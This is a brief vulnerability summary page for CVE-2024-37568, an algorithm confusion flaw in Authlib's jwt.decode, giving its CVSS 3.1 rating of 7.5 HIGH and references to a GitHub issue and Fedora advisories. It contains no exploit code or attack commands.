Algorithm Confusion Vulnerability in Authlib by Lepture
CVE-2024-37568

7.5HIGH

Key Information:

Vendor

Authlib

Status
Authlib
Vendor
CVE Published:
9 June 2024

What is CVE-2024-37568?

The Authlib framework developed by Lepture has a vulnerability that stems from algorithm confusion, particularly concerning the handling of asymmetric public keys. Specifically, when the jwt.decode method is called without specifying an algorithm, it inadvertently permits HMAC verification with any provided asymmetric public key. This flaw closely mirrors issues identified in prior vulnerabilities such as CVE-2022-29217 and CVE-2024-33663, emphasizing a significant security risk that could be exploited if not addressed in future updates.

References

https://github.com/lepture/authlib/issues/654
https://lists.fedoraproject.org/archives/list/package-ann...
vendor-advisory
https://lists.fedoraproject.org/archives/list/package-ann...
vendor-advisory

CVSS V3.1

Score:
7.5
Severity:
HIGH
Confidentiality:
None
Integrity:
High
Availability:
None
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
None
User Interaction:
None
Scope:
Unchanged

Timeline

  • Vulnerability published

JSON
.